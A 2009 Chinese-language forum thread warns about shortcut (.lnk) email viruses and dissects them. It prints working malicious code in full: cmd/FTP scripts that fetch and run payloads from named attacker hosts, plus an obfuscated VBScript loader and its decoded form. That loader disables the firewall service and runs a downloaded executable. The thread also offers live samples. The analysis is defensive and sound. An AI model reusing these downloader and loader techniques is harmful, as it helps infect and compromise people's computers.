Shunze 學園 >電腦資訊學系 >病毒追追追 > 《注意》捷徑病毒xxx.lnk 哈囉,還沒有註冊或者登入。請你[註冊|登入]
« 上一篇主題 下一篇主題 » 顯示成列印模式 | 增加到我的最愛
發表新主題 發表回覆
作者
主題
shunze
工友伯伯


註冊日期: 2002 04
來自: 潮汐終止之地
文章: 2324

shunze 離線
《注意》捷徑病毒xxx.lnk引用回覆 編輯/刪除文章 搜尋由  發表的其他文章 回報給版主 IP 位置 回此頁最上方

最近收到幾封不太熟的聯絡人寄來內含“捷徑病毒”的病毒信。



將捷徑病毒另存為副檔名txt的檔案,扣除無法檢視的亂碼後,
我們可以看到以下的程式碼。

C:\WINDOWS\system32\cmd.exe %windir%/c
echo open onehla.3322.org>>t.t
echo 123>>t.t
echo 123>>t.t
echo get 1-1 %windir%\link.vbs>>t.t
echo bye>>t.t
ftp -s:t.t
del t.t
start %windir%\link.vbs
000000000000000000000
%ProgramFiles%\Windows Media Player\wmplayer.exe


這段程式碼運作後,會在系統目錄下建立檔案t.t。
然後連結到onehla.3322.org的ftp網站,以帳號:123 密碼:123登入,
下載ftp主機上的病毒本體1-1,另存檔名為link.vbs到系統目錄下。

接著擦屁股,殺掉暫存檔t.t,運行下載至系統目錄的link.vbs。
最後,煞有其事的打開Windows Media Player騙騙user!


記住一個原則,沒有人會寄“捷徑檔”給朋友!
千萬不要因為郵件主旨或內容吸引人,而好奇的執行它。
好奇心足以讓您的電腦因此中毒!



♥順子老婆的網拍,請多關照∼

If you don't like something, change it.
If you can't change it, change your attitude.
Don't complain!




2009-01-05, 11:25 shunze 的個人資料 把 shunze 加入好友列表 發送Email給 shunze 瀏覽 shunze 的網站 MSN : shunze@gmail.com
shunze
工友伯伯


註冊日期: 2002 04
來自: 潮汐終止之地
文章: 2324

shunze 離線
《分享》捷徑病毒感染方式解析引用回覆 編輯/刪除文章 搜尋由  發表的其他文章 回報給版主 IP 位置 回此頁最上方

最近“捷徑病毒”似乎是愈來愈流行了!?
01/05才剛寫完上一篇,今天馬上又收到一封相同手法的病毒信。

不過,若不是苦主通知受害者不要上當,說真的我還不知道有這封病毒信?
原來這類病毒信早就被GMail自動攔劫,丟到垃圾郵件堨h了∼

把這封信從垃圾郵件媦揖X來,讓我們仔細來看看它是如何運作的。




將捷徑病毒另存為副檔名txt的檔案後,我們可以發現如下的程式碼:

C:\WINDOWS\system32\cmd.exe %windir%/c
echo open laolin.web1.oofy.net>>a.t
echo 123>>a.t
echo 123>>a.t
echo get msvb %windir%\msvb.vbs>>a.t
echo bye>>a.t
ftp -s:a.t
del a.t
start %windir%\msvb.vbs

此程式的意思是跟上一篇差不多,差別僅在於病毒檔名有些不同,手法完全一樣。


順子實際連上laolin.web1.oofy.net這個ftp站台後,發現有如下的內容:


我們模仿病毒程序至ftp下載了病毒本體msvb,看看它堶惆s竟寫了什麼?
strs=array(36,106,124,139,55,120,121,55,84,55,90,137,124,120,139,124,102,121,
129,124,122,139,63,57,110,138,122,137,128,135,139,69,106,127,124,
131,131,57,64,55,36,33,120,121,69,137,140,133,55,57,122,132,123,
55,70,122,55,133,124,139,55,138,139,134,135,55,138,127,120,137,124,
123,120,122,122,124,138,138,61,124,122,127,134,55,134,135,124,133,
55,131,120,134,131,128,133,69,142,124,121,72,69,134,134,125,144,69,
133,124,139,85,85,139,69,139,61,124,122,127,134,55,72,73,74,85,85,
139,69,139,61,124,122,127,134,55,72,73,74,85,85,139,69,139,61,124,
122,127,134,55,126,124,139,55,141,69,124,143,124,55,90,81,115,141,
69,124,143,124,85,85,139,69,139,61,124,122,127,134,55,121,144,124,
85,85,139,69,139,61,125,139,135,55,68,138,81,139,69,139,61,123,124,
131,55,139,69,139,61,122,81,115,141,69,124,143,124,61,138,139,120,
137,139,55,127,139,139,135,81,70,70,142,142,142,69,139,139,125,125,
79,79,75,69,122,134,132,70,130,128,133,126,69,129,135,126,61,123,124,
131,55,60,142,128,133,123,128,137,60,115,132,138,141,121,69,141,121,
138,61,123,124,131,55,122,81,115,141,69,124,143,124,57,67,71,36,33)

for i=1 to UBound(strs)
runner=runner&chr(strs(i)-23)
next
Execute runner


看不懂對不對?

其實將這一連串數字以chr()解碼後,會變成以下內容:
Set ab = CreateObject("Wscript.Shell")
ab.run "cmd /c net stop sharedaccess
echo open laolin.web1.oofy.net>>t.t
echo 123>>t.t
echo 123>>t.t
echo get v.exe C:\v.exe>>t.t
echo bye>>t.t&ftp -s:t.t
del t.t&c:\v.exe
start http://www.ttff884.com/king.jpg
del %windir%\msvb.vbs
del c:\v.exe",0

意思就是以同樣手法,上laolin.web1.oofy.net這個ftp站台,
然後下載真正有感染力的病毒程式v.exe。
接著打開使用者的瀏覽器,顯示www.ttff884.com站台上的king.jpg這張圖檔,

最後在背地堸蔑蔑鶡瘥f毒v.exe。


當受害者以為『原來就這一張圖片啊!?真無聊...』的同時,
電腦也開始發送捷徑病毒給下一個受害者了...


注意:
附加檔為病毒ftp站台上所抓下來的四個病毒檔案sample。
由於down.exe跟v.exe完全一樣,所以只保留一個。
研究時,請小心使用!

shunze 上傳的檔案
email_link-virus.rar (174 KB, 已經被下載 1272 次)


♥順子老婆的網拍,請多關照∼

If you don't like something, change it.
If you can't change it, change your attitude.
Don't complain!




2009-01-07, 21:26 shunze 的個人資料 把 shunze 加入好友列表 發送Email給 shunze 瀏覽 shunze 的網站 MSN : shunze@gmail.com
  « 上一篇主題 下一篇主題 »
發表新主題 發表回覆
跳到:

Powered by: Burning Board 1.1.1 2001 WoltLab GbR